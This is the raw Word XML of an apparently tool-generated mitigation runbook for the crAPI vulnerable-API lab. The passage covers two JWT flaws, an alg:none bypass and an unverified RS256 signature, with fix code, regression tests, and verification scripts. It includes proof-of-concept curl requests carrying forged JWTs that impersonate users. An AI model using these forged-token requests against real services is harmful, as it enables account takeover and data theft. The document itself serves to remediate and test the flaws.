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8"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">crAPI API Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation-Ready Mitigation Steps for Each Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: Pynt v1.26.7   |   Target: host.docker.internal:8888   |   Run: 2026-04-21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan ID: 733782f1-34df-47b7-88b3-c85176a9ac75   |   Vulnerabilities: 8   |   Critical: 4   |   High: 2   |   Medium: 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pynt performed an automated API security assessment against crAPI on 2026-04-21 and identified 8 distinct vulnerabilities across 10 tested endpoints. This document is a developer runbook: each vulnerability has numbered implementation steps with exact file paths, code changes, shell commands, and verification tests so that each fix can be applied, rebuilt, and confirmed independently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The mitigations are ordered by severity. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-04</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Exposed .env) is the highest priority — its remediation begins with credential rotation, not code, and must start within 24 hours. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-01, VULN-02 and VULN-03</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are critical-severity authentication and injection issues that allow unauthenticated or cross-user access. Each section is self-contained and can be assigned to a developer as a discrete work item.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability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400"/>
        <w:gridCol w:w="2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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Title</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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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OWASP</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VULN-01</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Unsigned JWT Accepted (alg: none)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00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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API2:2023</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VULN-02</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JWT Signature Not Validated</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00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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API2:2023</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VULN-03</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NoSQL Injection in Coupon Validation</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00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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API8:2019</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VULN-04</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Exposed .env File at Web Root</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00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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API8:2023</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VULN-05</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SSRF via mechanic_api Parameter</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65911"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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API7:2023</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VULN-06</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Unbounded number_of_repeats Causes DoS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65911"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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API4:2023</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VULN-07</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Guessable Sequential Coupon Codes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BF8F00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</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API8:2023</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VULN-08</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Missing Cache-Control on Sensitive Responses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BF8F00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</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API8:2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implementation Order</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recommended sequence for applying fixes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-04 first (within 24 hours)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — rotate all secrets exposed via /.env before any other fix is deployed. Assume every credential in that file is compromised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-01 and VULN-02 next</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — centralise JWT validation in identity-service and add allowlist-based algorithm enforcement to community-service and workshop-service. VULN-01 affects 6 endpoints across all three services; VULN-02 affects the dashboard endpoint specifically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-03 in parallel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the NoSQL injection patch in community-service is independent of the JWT work and can be done concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-05 and VULN-06</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — both modify the same workshop-service endpoint (contact_mechanic). Do them together to minimise restarts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-07 and VULN-08</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — backlog. VULN-07 requires a coupon-table migration; VULN-08 is a gateway-level middleware change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-01   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Unsigned JWT Accepted (alg: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Severity</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CRITICAL</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OWASP Mapping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API2:2023 — Broken Authentication</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Services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identity-service (Java/Spring), community-service (Go), workshop-service (Python/Django)</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Endpoints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POST /community/api/v2/community/posts, POST /community/api/v2/coupon/validate-coupon, POST /workshop/api/merchant/contact_mechanic, GET /workshop/api/shop/products, GET /identity/api/v2/vehicle/vehicles, GET /identity/api/v2/user/videos/55</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Pynt Finding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Unsigned JWT (None Algorithm)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Six endpoints across three services accept JWTs whose alg header is set to "none" and process them as authenticated. A token with header {"alg":"none"} and an empty signature segment is sufficient to impersonate any registered user. The root cause is that the JWT validation code paths fall through to a non-verifying branch when no signature is present, instead of rejecting the request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept (Pynt)</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Forged token — header decodes to {"alg":"none","kid":"","typ":""}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-X GET 'http://host.docker.internal:8888/identity/api/v2/vehicle/vehicles'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eyJhbGciOiJub25lIiwia2lkIjoiIiwidHlwIjoiIn0.\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eyJzdWIiOiJLcmFpZy5SdW5vbGZzc29uQGV4YW1wbGUuY29tIiwicm9sZSI6InVzZXIifQ.'</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200 OK   vehicle data returned for the impersonated user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce an algorithm allowlist in identity-service (Java)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the JWT helper used by the Spring filter chain and pin the accepted algorithm to HS512 (the algorithm crAPI signs with). Reject any token whose alg is not in the allowlist before any verification is attempted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/identity/src/main/java/com/crapi/config/JwtAuthTokenFilter.java</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BEFORE (relies on parser to figure out the algorithm)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Claims claims = Jwts.parser()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.setSigningKey(jwtSecret)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.parseClaimsJws(token)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.getBody();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AFTER (parses signed-only, then verifies the alg is allowed)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import io.jsonwebtoken.*;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import java.util.Set;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private static final Set&lt;String&gt; ALLOWED_ALGS = Set.of("HS512");</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Jws&lt;Claims&gt; jws = Jwts.parserBuilder()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.setSigningKey(jwtSecret)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.build()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.parseClaimsJws(token);   // throws on bad sig / unsigned tokens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String alg = jws.getHeader().getAlgorithm();</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if (alg == null || !ALLOWED_ALGS.contains(alg))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throw new io.jsonwebtoken.security.SignatureException(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"Disallowed JWT algorithm: " + alg);</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Claims claims = jws.getBody();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reject alg=none in community-service (Go)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">The community service parses JWTs with github.com/dgrijalva/jwt-go. Replace the default Parse() call with a keyFunc that rejects any non-HMAC method.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/community/api/middlewares/jwtMiddleware.go</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BEFORE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token, err := jwt.Parse(tokenString, func(t *jwt.Token) (interface{}, error)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[]byte(jwtSecret), nil</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AFTER (rejects "none" and any non-HMAC algorithm)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token, err := jwt.Parse(tokenString, func(t *jwt.Token) (interface{}, error)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Hard-deny alg=none and any non-HMAC method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_, ok := t.Method.(*jwt.SigningMethodHMAC); !ok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nil, fmt.Errorf("unexpected signing method: %v", t.Header["alg"])</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alg, _ := t.Header["alg"].(string); alg != "HS512"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nil, fmt.Errorf("disallowed alg: %s", alg)</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[]byte(jwtSecret), nil</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if err != nil || !token.Valid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http.Error(w, "Unauthorized", http.StatusUnauthorized)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3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reject alg=none in workshop-service (Python/Django)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">The workshop service uses PyJWT. Pass an explicit algorithms list to jwt.decode() — PyJWT silently allows alg=none if the algorithms argument is omitted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/workshop/crapi/shop/auth.py  (or wherever decode_jwt lives)</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BEFORE (vulnerable — algorithms not restricted)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payload = jwt.decode(token, settings.JWT_SECRET)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AFTER (only HS512 accepted; "none" is rejected by PyJWT)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import jwt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from jwt.exceptions import InvalidAlgorithmError, InvalidTokenError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ALLOWED_ALGORITHMS = ["HS512"]</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try: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payload = jwt.decode(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token,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settings.JWT_SECRET,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algorithms=ALLOWED_ALGORITHMS,   # &lt;-- mandatory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except (InvalidAlgorithmError, InvalidTokenError) as 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raise AuthenticationFailed(f"Invalid token: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rebuild all three services and run the canonical PoC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal: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cd deploy/docker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build crapi-identity crapi-community crapi-workshop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up -d crapi-identity crapi-community crapi-workshop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Re-run the exact PoC from the report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NONE_TOKEN='eyJhbGciOiJub25lIiwia2lkIjoiIiwidHlwIjoiIn0.eyJzdWIiOiJ4QGV4YW1wbGUuY29tIiwicm9sZSI6InVzZXIifQ.'</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for URL in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/identity/api/v2/vehicle/vehicles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/workshop/api/shop/products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/community/api/v2/community/posts ; do</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printf '%-50s ' "$URL"</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GET "http://localhost:8888$URL"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$NONE_TOKEN"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done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Expected output: 401 on every line</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="70AD47" w:sz="4"/>
          <w:bottom w:val="single" w:color="70AD47" w:sz="4"/>
          <w:left w:val="single" w:color="70AD47" w:sz="16"/>
          <w:right w:val="single" w:color="70AD47" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="E2EFDA" w:val="clear"/>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="385723"/>
        </w:rPr>
        <w:t xml:space="preserve">✔ VERIFY:  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">All six affected endpoints must respond with HTTP 401 when given a JWT whose alg header is "none". A properly signed HS512 token from /identity/api/auth/login must still succeed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-02   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JWT Signature Not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Severity</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CRITICAL</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OWASP Mapping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API2:2023 — Broken Authentication</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Service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identity-service (Java/Spring)</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Endpoint</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GET /identity/api/v2/user/dashboard</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Pynt Finding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JWT Signature Validation (alg=RS256 but no key verification performed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The dashboard endpoint accepts JWTs declaring alg=RS256 with an invalid signature. The code path that handles this token type calls a decode-without-verify helper, so any random bytes in the signature segment pass through. An attacker can forge a dashboard request for any victim email.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept (Pynt)</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-X GET 'http://host.docker.internal:8888/identity/api/v2/user/dashboard'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eyJhbGciOiJSUzI1NiJ9.\</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eyJzdWIiOiJ2aWN0aW1AZXhhbXBsZS5jb20iLCJyb2xlIjoidXNlciJ9.\</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INVALIDSIGNATUREHERE'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200 OK   dashboard for victim@example.com returned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove the unsafe decode path in JwtProvider</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Search for any call to parser().parse(...) (without parseClaimsJws) or to a custom 'decodeWithoutVerify' helper. These bypass signature verification and must be deleted. crAPI only ever needs verified parsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/identity/src/main/java/com/crapi/config/JwtProvider.java</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DELETE this method entirely if it exists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public Claims getClaimsWithoutSignature(String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Jwts.parser().setSigningKey(jwtSecret)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.parseClaimsJwt(token)   // &lt;-- parseClaimsJwt = NO sig check</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.getBody();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ALL callers must use this verifying method instead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public Claims getClaims(String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Jwts.parserBuilder()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.setSigningKey(jwtSecret)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.build()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.parseClaimsJws(token)   // &lt;-- parseClaimsJws verifies the signature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.getBody();</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2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit the dashboard controller call chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">The dashboard endpoint is reached through UserController -&gt; UserServiceImpl -&gt; JwtProvider. Confirm there is no second JWT-handling path that bypasses the filter chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal: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From repo root — list every JWT parse call in identity-service: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grep -rn --include="*.java" -E "parser\(|parseClaimsJwt|parseClaimsJws"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services/identity/src/main/java/</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Every hit must be parseClaimsJws (the verifying form).</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parser() and parseClaimsJwt(...) must NOT appear in any production code path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a regression test that asserts 401 on a bad signature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Add an integration test so this issue cannot reappear silently. The test uses a hand-crafted JWT with a deliberately invalid signature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/identity/src/test/java/com/crapi/integration/DashboardAuthTest.java</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@SpringBootTest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@AutoConfigureMockMvc</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class DashboardAuthTest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@Autowired MockMvc mvc;</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void dashboardRejectsInvalidSignature() throws Exception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Header = {"alg":"RS256"}, payload = victim email, sig = random bytes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String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"eyJhbGciOiJSUzI1NiJ9."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"eyJzdWIiOiJ2aWN0aW1AZXhhbXBsZS5jb20iLCJyb2xlIjoidXNlciJ9."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"INVALIDSIGNATUREHERE";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mvc.perform(get("/identity/api/v2/user/dashboard")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.header("Authorization", "Bearer " + token))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.andExpect(status().isUnauthorized());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4  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rebuild and verify against the live PoC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal: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build crapi-identity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up -d crapi-identity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Re-run the original PoC:</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GET 'http://localhost:8888/identity/api/v2/user/dashboard'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eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJ4QGV4YW1wbGUuY29tIn0.BAD'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Expected: 401  (was: 200)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Confirm a real signed token still works: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TOKEN=$(curl -s -X POST http://localhost:8888/identity/api/auth/login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'{"email":"test@test.com","password":"Password123!"}' | jq -r .token)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GET 'http://localhost:8888/identity/api/v2/user/dashboard'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$TOKEN"</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Expected: 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="70AD47" w:sz="4"/>
          <w:bottom w:val="single" w:color="70AD47" w:sz="4"/>
          <w:left w:val="single" w:color="70AD47" w:sz="16"/>
          <w:right w:val="single" w:color="70AD47" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="E2EFDA" w:val="clear"/>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="385723"/>
        </w:rPr>
        <w:t xml:space="preserve">✔ VERIFY:  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A JWT with a tampered signature must return HTTP 401. A correctly signed token from /identity/api/auth/login must still return HTTP 200. The new DashboardAuthTest must pass in CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
        </w:rPr>
